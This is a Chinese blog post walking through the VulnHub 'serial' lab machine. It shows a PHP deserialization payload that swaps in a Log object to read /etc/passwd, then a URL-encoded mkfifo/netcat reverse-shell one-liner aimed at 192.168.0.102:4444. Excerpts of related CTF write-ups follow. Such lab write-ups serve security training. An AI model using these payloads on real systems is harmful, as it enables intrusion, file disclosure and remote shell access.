serial靶机

最新推荐文章于 2024-10-09 17:45:19 发布
最新推荐文章于 2024-10-09 17:45:19 发布
阅读量380 收藏
点赞数 9
文章标签: android android studio ide
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66503195/article/details/140858368
版权

F12查看,是一串base64编码。

发现cookie是base64加密过的,解密后发现是经过序列化过的

用御剑扫描得到backup路径

审计代码

得到三个php文件他们放一起

经过代码审计可构造payload,尝试读取passwd文件

<?php
  class Log {
    private $type_log = "/etc/passwd";
  }

  class User {
    private $name = "admin";
    private $wel;

    function __construct() {
      $this->wel = new Log();
  }
}
$obj = new User();
echo base64_encode(serialize($obj));

获得shell

设置一个一句话木马

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.102+4444+>/tmp/f

得到密码

还好160
关注
HTB HARD 靶机 Cerberus WriteUp
qq_58869808的博客
03-26 8234
HTB Cerberus hard!!!靶机writeUp
vulnhub靶场serial-php渗透
问彡心的博客
07-31 1402
整个渗透过程中主要漏洞在于反序列化的利用配合远程文件包含,将wel的对象替换,由于恰好Log对象中存在handler函数且有文件包含,才能进行利用,我把这招称之为"偷梁换柱",还是很形象的,当执行一句话木马时,离成功也就不远了,随之从反弹终端中得到的账户密码进行远程登陆,在执行命令过程中通过提示发现了sudo下的vim是可以直接执行的,在vim命令行中有!command暂时离开vim到指令列模式下执行command的显示结果,利用此功能成功借用了bash来执行输入的命令httpshttps。...
php反序列化靶机serial实战
zzgslh的博客
04-07 1267
靶机描述 今天研究一下php反序列化,靶机serial实战。目标为获取root权限。 靶机信息 可以去vulhub上下载此靶机: https://www.vulnhub.com/entry/serial-1,349/ 下载好,之后,使用Vmware新建虚拟机打开,步骤如下: 1.首先创建新的虚拟机。 2.然后选择客户机版本为Ubuntu 64位。 3.然后选择使用现有磁盘,选择下载的...
vulhub-serial-php反序列化靶机实战
飞鱼的企鹅的博客
01-04 1967
前言 此漏洞环境是vulhub上的系列漏洞之一,是php反序列化漏洞,也用到了远程代码执行漏洞。 复现过程 环境搭建 靶机下载地址 https://www.vulnhub.com/entry/serial-1,349/ 下载好之后直接用Vmware workstation打开就行了 存活扫描 内网存活主机扫描 arp-scan -l 扫描到的存活主机是192.168.77.157 端口扫描 ...
php反序列靶场serial
weixin_57682301的博客
08-01 883
7.下载bak.zip里面有三个源代码,查看源代码可得知存在文件包含漏洞,可以构造payload加以利用输出一些我们想要的信息。3.使用物理机首先访问80端口,提示这里是新cookie进行程序测试,那我们查看cookie。9.将空格改为\x00,放到burp重放器里面发送。4.f12查看,是一段base64编码。6.进入backup子目录发现有压缩包。到这里思路突然断了,容up主思考一下。8.用base64解码得到字节序列。2.使用kali扫描nat端口。
vulnhub-serial靶机缺.vmx文件解决方法
zonei123的博客
01-18 466
https://www.vulnhub.com/entry/serial-1,349/ 官网下载的靶机解压后只有 serial.vmdk文件 Vmware workstation无法直接打开 所以要用记事本自行新建一个.vmx文件 代码如下: .encoding = “UTF-8” displayname = “serial” guestos = “other” virtualhw.version...
serial靶机教程
a666666688的博客
08-06 646
index.php⽂件中包含user.class.php⽂件且对cookie中的user参数进⾏了序列化和base64编码。user.class.php⽂件包含log.class.php⽂件且定义了Welcome和User两个类并调⽤了。log.class.php定义了Log类和成员变量type_log且handler函数对变量进⾏了⽂件包含和输出。对⽹站进⾏⼀个访问,⼤概意思为这是对新的cookie处理程序的测试版暂且搁置。log.class.php⽂件中的handler函数。
『VulnHub系列』serial: 2-Walkthrough
ins1ght的博客
11-10 1934
靶机发布日期:2019年9月27日,难度:中等++。用到了apk逆向和ELF中的ROP技术,web狗(小白)表示伤不起,一路硬刚下来的,求鼓励~
【vulnhub】BTRsys-2 靶机
Nicky_Zheng的博客
01-29 1270
1、信息收集 1.1、端口扫描 使用netdiscor或arp获取到靶机 ip:192.168.57.137 使用nmap获取端口信息 kali@kali:~$ sudo nmap -sSV -T4 -p 1-65535 -Pn -n 192.168.57.137 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( http
[网络安全自学篇] 八十二.WHUCTF之隐写和逆向类解题思路WP(文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析)
热门推荐
杨秀璋的专栏
06-04 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。这篇文章将详细讲解WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
HTB Devel[Hack The Box HTB靶场]writeup系列3
重新启程
02-01 2724
Retired Machines的第三台机器Devel 目录 0x00 靶机情况 0x01 端口扫描 0x02 ftp服务 0x03 上传payload 0x04 get webshell 0x05 提权 0x00 靶机情况 从靶机的情况来看,难度属于初级,基本上都是选择1、2、3分为主,操作系统是windows 0x01 端口扫描 看看靶机提供了哪些服务: roo...
web靶机系列-路径遍历
rlenew的博客
05-28 910
主机:192.168.136.133 靶机:192.168.136.136 用nmap扫靶机 用nikto、dirb再接着扫 访问http://192.168.136.136/dbadmin/ 看见有一个php文件,用owasp -zap web漏洞扫描器,自动挖掘web应用程序中的漏洞 发现有路径遍历漏洞 打开漏洞网址,发现有敏感泄露 dbadmin 敏感目录有敏感页面,但是我们发现还要登录,尝试一下弱口令登录。 弱口令有字母型和数字型。 字母型是用123456作为对应的用户名和密码,
Vulhub搭建漏洞靶机环境
baidu_38844729的博客
11-03 2656
前期准备 在kali中安装好docker环境并启动服务 正式安装 安装compose pip install docker-compose 下载Vulhub环境 下载地址:https://github.com/vulhub/vulhub/archive/master.zip 下载之后先解压,然后再使用FileZilla传输到kali上 更换镜像源 国内访问官方的docker镜像源非常缓...
Android 内存优化:什么原因导致内存问题?通过内存工具进行分析;内存抖动和内存泄漏;MAT的使用;Profiler的使用;如何优化?
前期后期
10-06 1300
我们开发一个App程序,如果不了解内存的使用情况,就是将稳定性弃之不管。因为你不知道他在什么时候会发生OOM问题,不知道为什么程序会卡顿,不知道为什么会发生问题。你也没有自信跟别人说,你可以也出一个稳定可靠的App程序,所以这一篇文章,我们来研究一下内存优化。 Android进行内存优化是为了提高应用的稳定性、流畅性和存活时间,同时降低应用占用的ROM空间。
android 全面屏最底部栏沉浸式
sdaujz的博客
10-04 419
Android 系统 Bar 沉浸式完美兼容方案自 Android 5.0 版本,Android 带来了沉浸式系统 ba - 掘金 (juejin.cn)Activity的onCreate方法中添加。
安卓上的iso 是哪几个gain 相乘
最新发布
qq_40323742的博客
10-09 311
在安卓的相机系统中,表示感光度,它实际上反映的是图像传感器对光线的整体响应度。ISO 值的调整可以通过增益(gain)的调节实现,增益会放大传感器采集的信号强度。
Android Framework默认授予app通知使用权限
zmlovelx(帅得不敢出门 程序员群31843264)
10-09 440
在安卓系统中,应用程序需要获取通知使用权限才能向用户发送通知。如下图, 需要手动配置.文章实现默认授予app通知权限,不需要手动处理.
Windows2008服务器上搭建五种靶机教程
"该资源是一份关于如何搭建五种不同靶机的教程,由张学飞撰写,主要针对Windows 2008服务器环境。涉及的靶机包括DVWA(Damn Vulnerable Web Application)、MCIR、Pikachu、mutillidae以及bWAPP。这些靶机主要用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值